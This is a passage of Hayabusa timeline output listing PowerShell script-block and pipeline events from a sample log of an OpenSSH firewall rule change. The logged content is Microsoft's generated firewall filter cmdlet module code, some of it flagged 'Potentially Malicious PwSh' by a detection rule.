= [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.026 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.027 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.027 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.027 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.028 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.075 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.075 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.076 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.076 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.077 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.078 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.110 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.111 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.112 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.112 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.142 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { 